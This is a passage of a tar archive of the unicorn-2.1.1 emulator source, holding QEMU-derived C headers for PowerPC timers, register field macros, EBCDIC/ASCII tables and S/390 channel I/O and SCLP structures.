NULL) (*clk->cb)(clk->opaque, freq); } struct ppc_tb_t { /* Time base management */ int64_t tb_offset; /* Compensation */ int64_t atb_offset; /* Compensation */ int64_t vtb_offset; uint32_t tb_freq; /* TB frequency */ /* Decrementer management */ uint64_t decr_next; /* Tick for next decr interrupt */ uint32_t decr_freq; /* decrementer frequency */ QEMUTimer *decr_timer; /* Hypervisor decrementer management */ uint64_t hdecr_next; /* Tick for next hdecr interrupt */ QEMUTimer *hdecr_timer; int64_t purr_offset; void *opaque; uint32_t flags; }; /* PPC Timers flags */ #define PPC_TIMER_BOOKE (1 << 0) /* Enable Booke support */ #define PPC_TIMER_E500 (1 << 1) /* Enable e500 support */ #define PPC_DECR_UNDERFLOW_TRIGGERED (1 << 2) /* Decr interrupt triggered when * the most significant bit * changes from 0 to 1. */ #define PPC_DECR_ZERO_TRIGGERED (1 << 3) /* Decr interrupt triggered when * the decrementer reaches zero. */ #define PPC_DECR_UNDERFLOW_LEVEL (1 << 4) /* Decr interrupt active when * the most significant bit is 1. 
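 *
 * (Example, an assumption rather than part of the original comment: a
 * Book E style decrementer is the zero-triggered kind, i.e. it would be
 * described with PPC_DECR_ZERO_TRIGGERED, while the classic 6xx
 * decrementer fires on the 0-to-1 transition of the most significant
 * bit.)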
*/ uint64_t cpu_ppc_get_tb(ppc_tb_t *tb_env, uint64_t vmclk, int64_t tb_offset); clk_setup_cb cpu_ppc_tb_init (CPUPPCState *env, uint32_t freq); /* Embedded PowerPC DCR management */ typedef uint32_t (*dcr_read_cb)(void *opaque, int dcrn); typedef void (*dcr_write_cb)(void *opaque, int dcrn, uint32_t val); int ppc_dcr_init (CPUPPCState *env, int (*dcr_read_error)(int dcrn), int (*dcr_write_error)(int dcrn)); int ppc_dcr_register (CPUPPCState *env, int dcrn, void *opaque, dcr_read_cb drc_read, dcr_write_cb dcr_write); clk_setup_cb ppc_40x_timers_init (CPUPPCState *env, uint32_t freq, unsigned int decr_excp); /* Embedded PowerPC reset */ void ppc40x_core_reset(PowerPCCPU *cpu); void ppc40x_chip_reset(PowerPCCPU *cpu); void ppc40x_system_reset(PowerPCCPU *cpu); #if defined(CONFIG_USER_ONLY) static inline void ppc40x_irq_init(PowerPCCPU *cpu) {} static inline void ppc6xx_irq_init(PowerPCCPU *cpu) {} static inline void ppc970_irq_init(PowerPCCPU *cpu) {} static inline void ppcPOWER7_irq_init(PowerPCCPU *cpu) {} static inline void ppcPOWER9_irq_init(PowerPCCPU *cpu) {} static inline void ppce500_irq_init(PowerPCCPU *cpu) {} static inline void ppc_irq_reset(PowerPCCPU *cpu) {} #else void ppc40x_irq_init(PowerPCCPU *cpu); void ppce500_irq_init(PowerPCCPU *cpu); void ppc6xx_irq_init(PowerPCCPU *cpu); void ppc970_irq_init(PowerPCCPU *cpu); void ppcPOWER7_irq_init(PowerPCCPU *cpu); void ppcPOWER9_irq_init(PowerPCCPU *cpu); void ppc_irq_reset(PowerPCCPU *cpu); #endif /* PPC machines for OpenBIOS */ enum { ARCH_PREP = 0, ARCH_MAC99, ARCH_HEATHROW, ARCH_MAC99_U3, }; #define FW_CFG_PPC_WIDTH (FW_CFG_ARCH_LOCAL + 0x00) #define FW_CFG_PPC_HEIGHT (FW_CFG_ARCH_LOCAL + 0x01) #define FW_CFG_PPC_DEPTH (FW_CFG_ARCH_LOCAL + 0x02) #define FW_CFG_PPC_TBFREQ (FW_CFG_ARCH_LOCAL + 0x03) #define FW_CFG_PPC_CLOCKFREQ (FW_CFG_ARCH_LOCAL + 0x04) #define FW_CFG_PPC_IS_KVM (FW_CFG_ARCH_LOCAL + 0x05) #define FW_CFG_PPC_KVM_HC (FW_CFG_ARCH_LOCAL + 0x06) #define FW_CFG_PPC_KVM_PID (FW_CFG_ARCH_LOCAL + 0x07) #define FW_CFG_PPC_NVRAM_ADDR (FW_CFG_ARCH_LOCAL + 0x08) #define FW_CFG_PPC_BUSFREQ (FW_CFG_ARCH_LOCAL + 0x09) #define FW_CFG_PPC_NVRAM_FLAT (FW_CFG_ARCH_LOCAL + 0x0a) #define FW_CFG_PPC_VIACONFIG (FW_CFG_ARCH_LOCAL + 0x0b) #define PPC_SERIAL_MM_BAUDBASE 399193 /* ppc_booke.c */ void ppc_booke_timers_init(PowerPCCPU *cpu, uint32_t freq, uint32_t flags); #endif ��������������������������������������������������unicorn-2.1.1/qemu/include/hw/registerfields.h������������������������������������������������������0000664�0000000�0000000�00000011424�14675241067�0021402�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Register Definition API: field macros * * Copyright (c) 2016 Xilinx Inc. * Copyright (c) 2013 Peter Crosthwaite <peter.crosthwaite@xilinx.com> * * This work is licensed under the terms of the GNU GPL, version 2. See * the COPYING file in the top-level directory. */ #ifndef REGISTERFIELDS_H #define REGISTERFIELDS_H #include "qemu/bitops.h" /* Define constants for a 32 bit register */ /* This macro will define A_FOO, for the byte address of a register * as well as R_FOO for the uint32_t[] register number (A_FOO / 4). 
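 *
 * Example (register name is made up): REG32(CTRL, 0x48) defines
 * A_CTRL = 0x48 and R_CTRL = 0x12, so a device model can refer to the
 * same register either as regs[R_CTRL] or by its byte offset A_CTRL.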
 */
#define REG32(reg, addr)                                                  \
    enum { A_ ## reg = (addr) };                                          \
    enum { R_ ## reg = (addr) / 4 };

#define REG8(reg, addr)                                                   \
    enum { A_ ## reg = (addr) };                                          \
    enum { R_ ## reg = (addr) };

#define REG16(reg, addr)                                                  \
    enum { A_ ## reg = (addr) };                                          \
    enum { R_ ## reg = (addr) / 2 };

/* Define SHIFT, LENGTH and MASK constants for a field within a register */

/* This macro will define R_FOO_BAR_MASK, R_FOO_BAR_SHIFT and R_FOO_BAR_LENGTH
 * constants for field BAR in register FOO.
 */
#define FIELD(reg, field, shift, length)                                  \
    enum { R_ ## reg ## _ ## field ## _SHIFT = (shift)};                  \
    enum { R_ ## reg ## _ ## field ## _LENGTH = (length)};                \
    enum { R_ ## reg ## _ ## field ## _MASK =                             \
           MAKE_64BIT_MASK(shift, length)};

/* Extract a field from a register */
#define FIELD_EX8(storage, reg, field)                                    \
    extract8((storage), R_ ## reg ## _ ## field ## _SHIFT,                \
             R_ ## reg ## _ ## field ## _LENGTH)
#define FIELD_EX16(storage, reg, field)                                   \
    extract16((storage), R_ ## reg ## _ ## field ## _SHIFT,               \
              R_ ## reg ## _ ## field ## _LENGTH)
#define FIELD_EX32(storage, reg, field)                                   \
    extract32((storage), R_ ## reg ## _ ## field ## _SHIFT,               \
              R_ ## reg ## _ ## field ## _LENGTH)
#define FIELD_EX64(storage, reg, field)                                   \
    extract64((storage), R_ ## reg ## _ ## field ## _SHIFT,               \
              R_ ## reg ## _ ## field ## _LENGTH)

/* Extract a field from an array of registers */
#define ARRAY_FIELD_EX32(regs, reg, field)                                \
    FIELD_EX32((regs)[R_ ## reg], reg, field)

/* Deposit a register field.
 * Assigning values larger than the target field will result in
 * compilation warnings.
 */
#define FIELD_DP8(storage, reg, field, val, d) {                          \
    struct {                                                              \
        unsigned int v:R_ ## reg ## _ ## field ## _LENGTH;                \
    } v = { .v = val };                                                   \
    d = deposit32((storage), R_ ## reg ## _ ## field ## _SHIFT,           \
                  R_ ## reg ## _ ## field ## _LENGTH, v.v);               \
}
#define FIELD_DP16(storage, reg, field, val, d) {                         \
    struct {                                                              \
        unsigned int v:R_ ## reg ## _ ## field ## _LENGTH;                \
    } v = { .v = val };                                                   \
    d = deposit32((storage), R_ ## reg ## _ ## field ## _SHIFT,           \
                  R_ ## reg ## _ ## field ## _LENGTH, v.v);               \
}
#define FIELD_DP32(storage, reg, field, val, d) {                         \
    struct {                                                              \
        unsigned int v:R_ ## reg ## _ ## field ## _LENGTH;                \
    } v = { .v = val };                                                   \
    d = deposit32((storage), R_ ## reg ## _ ## field ## _SHIFT,           \
                  R_ ## reg ## _ ## field ## _LENGTH, v.v);               \
}
#define FIELD_DP64(storage, reg, field, val, d) {                         \
    struct {                                                              \
        unsigned int v:R_ ## reg ## _ ## field ## _LENGTH;                \
    } v = { .v = val };                                                   \
    d = deposit64((storage), R_ ## reg ## _ ## field ## _SHIFT,           \
                  R_ ## reg ## _ ## field ## _LENGTH, v.v);               \
}

/* Deposit a field into an array of registers.
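 *
 * Usage sketch for the five-argument deposit macros above (register and
 * field names are made up):
 *
 *     uint32_t updated;
 *     FIELD_DP32(s->ctrl, CTRL, EN, 1, updated);
 *     s->ctrl = updated;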
*/ #define ARRAY_FIELD_DP32(regs, reg, field, val) \ (regs)[R_ ## reg] = FIELD_DP32((regs)[R_ ## reg], reg, field, val); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017102�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/ebcdic.h��������������������������������������������������������0000664�0000000�0000000�00000010026�14675241067�0020463�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * EBCDIC/ASCII conversion Support * * Copyright (c) 2011 Alexander Graf * Copyright IBM, Corp. 2013 * * This work is licensed under the terms of the GNU GPL, version 2 or (at your * option) any later version. See the COPYING file in the top-level directory. * */ #ifndef EBCDIC_H #define EBCDIC_H /* EBCDIC handling */ static const uint8_t ebcdic2ascii[] = { 0x00, 0x01, 0x02, 0x03, 0x07, 0x09, 0x07, 0x7F, 0x07, 0x07, 0x07, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x07, 0x0A, 0x08, 0x07, 0x18, 0x19, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x1C, 0x07, 0x07, 0x0A, 0x17, 0x1B, 0x07, 0x07, 0x07, 0x07, 0x07, 0x05, 0x06, 0x07, 0x07, 0x07, 0x16, 0x07, 0x07, 0x07, 0x07, 0x04, 0x07, 0x07, 0x07, 0x07, 0x14, 0x15, 0x07, 0x1A, 0x20, 0xFF, 0x83, 0x84, 0x85, 0xA0, 0x07, 0x86, 0x87, 0xA4, 0x5B, 0x2E, 0x3C, 0x28, 0x2B, 0x21, 0x26, 0x82, 0x88, 0x89, 0x8A, 0xA1, 0x8C, 0x07, 0x8D, 0xE1, 0x5D, 0x24, 0x2A, 0x29, 0x3B, 0x5E, 0x2D, 0x2F, 0x07, 0x8E, 0x07, 0x07, 0x07, 0x8F, 0x80, 0xA5, 0x07, 0x2C, 0x25, 0x5F, 0x3E, 0x3F, 0x07, 0x90, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x70, 0x60, 0x3A, 0x23, 0x40, 0x27, 0x3D, 0x22, 0x07, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0xAE, 0xAF, 0x07, 0x07, 0x07, 0xF1, 0xF8, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0xA6, 0xA7, 0x91, 0x07, 0x92, 0x07, 0xE6, 0x7E, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0xAD, 0xAB, 0x07, 0x07, 0x07, 0x07, 0x9B, 0x9C, 0x9D, 0xFA, 0x07, 0x07, 0x07, 0xAC, 0xAB, 0x07, 0xAA, 0x7C, 0x07, 0x07, 0x07, 0x07, 0x7B, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x07, 0x93, 0x94, 0x95, 0xA2, 0x07, 0x7D, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x07, 0x96, 0x81, 0x97, 0xA3, 0x98, 0x5C, 0xF6, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0xFD, 0x07, 0x99, 0x07, 0x07, 0x07, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x07, 0x07, 0x9A, 0x07, 0x07, 0x07, }; static const uint8_t ascii2ebcdic[] = { 0x00, 0x01, 0x02, 0x03, 0x37, 0x2D, 0x2E, 0x2F, 0x16, 0x05, 0x15, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x3C, 0x3D, 0x32, 0x26, 0x18, 0x19, 0x3F, 0x27, 0x22, 0x1D, 0x1E, 0x1F, 0x40, 0x5A, 0x7F, 0x7B, 0x5B, 
0x6C, 0x50, 0x7D, 0x4D, 0x5D, 0x5C, 0x4E, 0x6B, 0x60, 0x4B, 0x61, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0x7A, 0x5E, 0x4C, 0x7E, 0x6E, 0x6F, 0x7C, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xBA, 0xE0, 0xBB, 0xB0, 0x6D, 0x79, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xC0, 0x4F, 0xD0, 0xA1, 0x07, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x59, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x90, 0x3F, 0x3F, 0x3F, 0x3F, 0xEA, 0x3F, 0xFF }; static inline void ebcdic_put(uint8_t *p, const char *ascii, int len) { int i; for (i = 0; i < len; i++) { p[i] = ascii2ebcdic[(uint8_t)ascii[i]]; } } static inline void ascii_put(uint8_t *p, const char *ebcdic, int len) { int i; for (i = 0; i < len; i++) { p[i] = ebcdic2ascii[(uint8_t)ebcdic[i]]; } } #endif /* EBCDIC_H */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/ioinst.h��������������������������������������������������������0000664�0000000�0000000�00000016054�14675241067�0020566�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 channel I/O instructions * * Copyright 2012 IBM Corp. * Author(s): Cornelia Huck <cornelia.huck@de.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef S390X_IOINST_H #define S390X_IOINST_H /* * Channel I/O related definitions, as defined in the Principles * Of Operation (and taken from the Linux implementation). 
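 *
 * (Sketch of a typical consumer, not from this header: interrupt
 * handling code tests the SCSW control word defined below, e.g.
 * "if (scsw->ctrl & SCSW_STCTL_STATUS_PEND)" to see whether status is
 * pending for the subchannel.)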
*/ /* subchannel status word (command mode only) */ typedef struct SCSW { uint16_t flags; uint16_t ctrl; uint32_t cpa; uint8_t dstat; uint8_t cstat; uint16_t count; } SCSW; QEMU_BUILD_BUG_MSG(sizeof(SCSW) != 12, "size of SCSW is wrong"); #define SCSW_FLAGS_MASK_KEY 0xf000 #define SCSW_FLAGS_MASK_SCTL 0x0800 #define SCSW_FLAGS_MASK_ESWF 0x0400 #define SCSW_FLAGS_MASK_CC 0x0300 #define SCSW_FLAGS_MASK_FMT 0x0080 #define SCSW_FLAGS_MASK_PFCH 0x0040 #define SCSW_FLAGS_MASK_ISIC 0x0020 #define SCSW_FLAGS_MASK_ALCC 0x0010 #define SCSW_FLAGS_MASK_SSI 0x0008 #define SCSW_FLAGS_MASK_ZCC 0x0004 #define SCSW_FLAGS_MASK_ECTL 0x0002 #define SCSW_FLAGS_MASK_PNO 0x0001 #define SCSW_CTRL_MASK_FCTL 0x7000 #define SCSW_CTRL_MASK_ACTL 0x0fe0 #define SCSW_CTRL_MASK_STCTL 0x001f #define SCSW_FCTL_CLEAR_FUNC 0x1000 #define SCSW_FCTL_HALT_FUNC 0x2000 #define SCSW_FCTL_START_FUNC 0x4000 #define SCSW_ACTL_SUSP 0x0020 #define SCSW_ACTL_DEVICE_ACTIVE 0x0040 #define SCSW_ACTL_SUBCH_ACTIVE 0x0080 #define SCSW_ACTL_CLEAR_PEND 0x0100 #define SCSW_ACTL_HALT_PEND 0x0200 #define SCSW_ACTL_START_PEND 0x0400 #define SCSW_ACTL_RESUME_PEND 0x0800 #define SCSW_STCTL_STATUS_PEND 0x0001 #define SCSW_STCTL_SECONDARY 0x0002 #define SCSW_STCTL_PRIMARY 0x0004 #define SCSW_STCTL_INTERMEDIATE 0x0008 #define SCSW_STCTL_ALERT 0x0010 #define SCSW_DSTAT_ATTENTION 0x80 #define SCSW_DSTAT_STAT_MOD 0x40 #define SCSW_DSTAT_CU_END 0x20 #define SCSW_DSTAT_BUSY 0x10 #define SCSW_DSTAT_CHANNEL_END 0x08 #define SCSW_DSTAT_DEVICE_END 0x04 #define SCSW_DSTAT_UNIT_CHECK 0x02 #define SCSW_DSTAT_UNIT_EXCEP 0x01 #define SCSW_CSTAT_PCI 0x80 #define SCSW_CSTAT_INCORR_LEN 0x40 #define SCSW_CSTAT_PROG_CHECK 0x20 #define SCSW_CSTAT_PROT_CHECK 0x10 #define SCSW_CSTAT_DATA_CHECK 0x08 #define SCSW_CSTAT_CHN_CTRL_CHK 0x04 #define SCSW_CSTAT_INTF_CTRL_CHK 0x02 #define SCSW_CSTAT_CHAIN_CHECK 0x01 /* path management control word */ typedef struct PMCW { uint32_t intparm; uint16_t flags; uint16_t devno; uint8_t lpm; uint8_t pnom; uint8_t lpum; uint8_t pim; uint16_t mbi; uint8_t pom; uint8_t pam; uint8_t chpid[8]; uint32_t chars; } PMCW; QEMU_BUILD_BUG_MSG(sizeof(PMCW) != 28, "size of PMCW is wrong"); #define PMCW_FLAGS_MASK_QF 0x8000 #define PMCW_FLAGS_MASK_W 0x4000 #define PMCW_FLAGS_MASK_ISC 0x3800 #define PMCW_FLAGS_MASK_ENA 0x0080 #define PMCW_FLAGS_MASK_LM 0x0060 #define PMCW_FLAGS_MASK_MME 0x0018 #define PMCW_FLAGS_MASK_MP 0x0004 #define PMCW_FLAGS_MASK_TF 0x0002 #define PMCW_FLAGS_MASK_DNV 0x0001 #define PMCW_FLAGS_MASK_INVALID 0x0700 #define PMCW_CHARS_MASK_ST 0x00e00000 #define PMCW_CHARS_MASK_MBFC 0x00000004 #define PMCW_CHARS_MASK_XMWME 0x00000002 #define PMCW_CHARS_MASK_CSENSE 0x00000001 #define PMCW_CHARS_MASK_INVALID 0xff1ffff8 /* subchannel information block */ QEMU_PACK(typedef struct SCHIB { PMCW pmcw; SCSW scsw; uint64_t mba; uint8_t mda[4]; }) SCHIB; /* interruption response block */ typedef struct IRB { SCSW scsw; uint32_t esw[5]; uint32_t ecw[8]; uint32_t emw[8]; } IRB; QEMU_BUILD_BUG_MSG(sizeof(IRB) != 96, "size of IRB is wrong"); /* operation request block */ typedef struct ORB { uint32_t intparm; uint16_t ctrl0; uint8_t lpm; uint8_t ctrl1; uint32_t cpa; } ORB; QEMU_BUILD_BUG_MSG(sizeof(ORB) != 12, "size of ORB is wrong"); #define ORB_CTRL0_MASK_KEY 0xf000 #define ORB_CTRL0_MASK_SPND 0x0800 #define ORB_CTRL0_MASK_STR 0x0400 #define ORB_CTRL0_MASK_MOD 0x0200 #define ORB_CTRL0_MASK_SYNC 0x0100 #define ORB_CTRL0_MASK_FMT 0x0080 #define ORB_CTRL0_MASK_PFCH 0x0040 #define ORB_CTRL0_MASK_ISIC 0x0020 #define ORB_CTRL0_MASK_ALCC 0x0010 #define 
ORB_CTRL0_MASK_SSIC 0x0008 #define ORB_CTRL0_MASK_C64 0x0002 #define ORB_CTRL0_MASK_I2K 0x0001 #define ORB_CTRL0_MASK_INVALID 0x0004 #define ORB_CTRL1_MASK_ILS 0x80 #define ORB_CTRL1_MASK_MIDAW 0x40 #define ORB_CTRL1_MASK_ORBX 0x01 #define ORB_CTRL1_MASK_INVALID 0x3e /* channel command word (type 0) */ typedef struct CCW0 { uint8_t cmd_code; uint8_t cda0; uint16_t cda1; uint8_t flags; uint8_t reserved; uint16_t count; } CCW0; QEMU_BUILD_BUG_MSG(sizeof(CCW0) != 8, "size of CCW0 is wrong"); /* channel command word (type 1) */ typedef struct CCW1 { uint8_t cmd_code; uint8_t flags; uint16_t count; uint32_t cda; } CCW1; QEMU_BUILD_BUG_MSG(sizeof(CCW1) != 8, "size of CCW1 is wrong"); #define CCW_FLAG_DC 0x80 #define CCW_FLAG_CC 0x40 #define CCW_FLAG_SLI 0x20 #define CCW_FLAG_SKIP 0x10 #define CCW_FLAG_PCI 0x08 #define CCW_FLAG_IDA 0x04 #define CCW_FLAG_SUSPEND 0x02 #define CCW_FLAG_MIDA 0x01 #define CCW_CMD_NOOP 0x03 #define CCW_CMD_BASIC_SENSE 0x04 #define CCW_CMD_TIC 0x08 #define CCW_CMD_SENSE_ID 0xe4 typedef struct CRW { uint16_t flags; uint16_t rsid; } CRW; QEMU_BUILD_BUG_MSG(sizeof(CRW) != 4, "size of CRW is wrong"); #define CRW_FLAGS_MASK_S 0x4000 #define CRW_FLAGS_MASK_R 0x2000 #define CRW_FLAGS_MASK_C 0x1000 #define CRW_FLAGS_MASK_RSC 0x0f00 #define CRW_FLAGS_MASK_A 0x0080 #define CRW_FLAGS_MASK_ERC 0x003f #define CRW_ERC_EVENT 0x00 /* event information pending */ #define CRW_ERC_AVAIL 0x01 /* available */ #define CRW_ERC_INIT 0x02 /* initialized */ #define CRW_ERC_TERROR 0x03 /* temporary error */ #define CRW_ERC_IPI 0x04 /* installed parm initialized */ #define CRW_ERC_TERM 0x05 /* terminal */ #define CRW_ERC_PERRN 0x06 /* perm. error, facility not init */ #define CRW_ERC_PERRI 0x07 /* perm. error, facility init */ #define CRW_ERC_PMOD 0x08 /* installed parameters modified */ #define CRW_ERC_IPR 0x0A /* installed parameters restored */ #define CRW_RSC_SUBCH 0x3 #define CRW_RSC_CHP 0x4 #define CRW_RSC_CSS 0xb /* I/O interruption code */ QEMU_PACK(typedef struct IOIntCode { uint32_t subsys_id; uint32_t intparm; uint32_t interrupt_id; }) IOIntCode; /* schid disintegration */ #define IOINST_SCHID_ONE(_schid) ((_schid & 0x00010000) >> 16) #define IOINST_SCHID_M(_schid) ((_schid & 0x00080000) >> 19) #define IOINST_SCHID_CSSID(_schid) ((_schid & 0xff000000) >> 24) #define IOINST_SCHID_SSID(_schid) ((_schid & 0x00060000) >> 17) #define IOINST_SCHID_NR(_schid) (_schid & 0x0000ffff) #define IO_INT_WORD_ISC(_int_word) ((_int_word & 0x38000000) >> 27) #define ISC_TO_ISC_BITS(_isc) ((0x80 >> _isc) << 24) #define IO_INT_WORD_AI 0x80000000 int ioinst_disassemble_sch_ident(uint32_t value, int *m, int *cssid, int *ssid, int *schid); #endif 
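/*
 * Illustrative sketch (not part of the original header, placed here purely
 * as an example): taking a subchannel identifier apart with the
 * IOINST_SCHID_* macros above. 0x00010003 is an arbitrary value: cssid 0,
 * ssid 0, the mandatory "one" bit set, subchannel number 3.
 */
static inline void ioinst_schid_example(void)
{
    uint32_t schid = 0x00010003;
    int cssid = IOINST_SCHID_CSSID(schid); /* 0 */
    int ssid = IOINST_SCHID_SSID(schid);   /* 0 */
    int nr = IOINST_SCHID_NR(schid);       /* 3 */

    (void)cssid;
    (void)ssid;
    (void)nr;
}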
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/sclp.h����������������������������������������������������������0000664�0000000�0000000�00000016267�14675241067�0020230�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * SCLP Support * * Copyright IBM, Corp. 2012 * * Authors: * Christian Borntraeger <borntraeger@de.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at your * option) any later version. See the COPYING file in the top-level directory. * */ #ifndef HW_S390_SCLP_H #define HW_S390_SCLP_H //#include "hw/sysbus.h" #include "target/s390x/cpu-qom.h" #define SCLP_CMD_CODE_MASK 0xffff00ff /* SCLP command codes */ #define SCLP_CMDW_READ_SCP_INFO 0x00020001 #define SCLP_CMDW_READ_SCP_INFO_FORCED 0x00120001 #define SCLP_READ_STORAGE_ELEMENT_INFO 0x00040001 #define SCLP_ATTACH_STORAGE_ELEMENT 0x00080001 #define SCLP_ASSIGN_STORAGE 0x000D0001 #define SCLP_UNASSIGN_STORAGE 0x000C0001 #define SCLP_CMD_READ_EVENT_DATA 0x00770005 #define SCLP_CMD_WRITE_EVENT_DATA 0x00760005 #define SCLP_CMD_WRITE_EVENT_MASK 0x00780005 /* SCLP Memory hotplug codes */ #define SCLP_FC_ASSIGN_ATTACH_READ_STOR 0xE00000000000ULL #define SCLP_STARTING_SUBINCREMENT_ID 0x10001 #define SCLP_INCREMENT_UNIT 0x10000 #define MAX_STORAGE_INCREMENTS 1020 /* CPU hotplug SCLP codes */ #define SCLP_HAS_CPU_INFO 0x0C00000000000000ULL #define SCLP_CMDW_READ_CPU_INFO 0x00010001 #define SCLP_CMDW_CONFIGURE_CPU 0x00110001 #define SCLP_CMDW_DECONFIGURE_CPU 0x00100001 /* SCLP PCI codes */ #define SCLP_HAS_IOA_RECONFIG 0x0000000040000000ULL #define SCLP_CMDW_CONFIGURE_IOA 0x001a0001 #define SCLP_CMDW_DECONFIGURE_IOA 0x001b0001 #define SCLP_RECONFIG_PCI_ATYPE 2 /* SCLP response codes */ #define SCLP_RC_NORMAL_READ_COMPLETION 0x0010 #define SCLP_RC_NORMAL_COMPLETION 0x0020 #define SCLP_RC_SCCB_BOUNDARY_VIOLATION 0x0100 #define SCLP_RC_NO_ACTION_REQUIRED 0x0120 #define SCLP_RC_INVALID_SCLP_COMMAND 0x01f0 #define SCLP_RC_CONTAINED_EQUIPMENT_CHECK 0x0340 #define SCLP_RC_INSUFFICIENT_SCCB_LENGTH 0x0300 #define SCLP_RC_STANDBY_READ_COMPLETION 0x0410 #define SCLP_RC_ADAPTER_IN_RESERVED_STATE 0x05f0 #define SCLP_RC_ADAPTER_TYPE_NOT_RECOGNIZED 0x06f0 #define SCLP_RC_ADAPTER_ID_NOT_RECOGNIZED 0x09f0 #define SCLP_RC_INVALID_FUNCTION 0x40f0 #define SCLP_RC_NO_EVENT_BUFFERS_STORED 0x60f0 #define SCLP_RC_INVALID_SELECTION_MASK 0x70f0 #define SCLP_RC_INCONSISTENT_LENGTHS 0x72f0 #define SCLP_RC_EVENT_BUFFER_SYNTAX_ERROR 0x73f0 #define SCLP_RC_INVALID_MASK_LENGTH 0x74f0 /* Service Call Control Block (SCCB) and its elements */ #define SCCB_SIZE 4096 #define SCLP_VARIABLE_LENGTH_RESPONSE 0x80 #define SCLP_EVENT_BUFFER_ACCEPTED 0x80 #define SCLP_FC_NORMAL_WRITE 0 /* * Normally packed structures are not the right thing to do, since all code * must take care of endianness. 
We cannot use ldl_phys and friends for two * reasons, though: * - some of the embedded structures below the SCCB can appear multiple times * at different locations, so there is no fixed offset * - we work on a private copy of the SCCB, since there are several length * fields, that would cause a security nightmare if we allow the guest to * alter the structure while we parse it. We cannot use ldl_p and friends * either without doing pointer arithmetics * So we have to double check that all users of sclp data structures use the * right endianness wrappers. */ QEMU_PACK(typedef struct SCCBHeader { uint16_t length; uint8_t function_code; uint8_t control_mask[3]; uint16_t response_code; }) SCCBHeader; #define SCCB_DATA_LEN (SCCB_SIZE - sizeof(SCCBHeader)) #define SCCB_CPU_FEATURE_LEN 6 /* CPU information */ QEMU_PACK(typedef struct CPUEntry { uint8_t address; uint8_t reserved0; uint8_t features[SCCB_CPU_FEATURE_LEN]; uint8_t reserved2[6]; uint8_t type; uint8_t reserved1; }) CPUEntry; 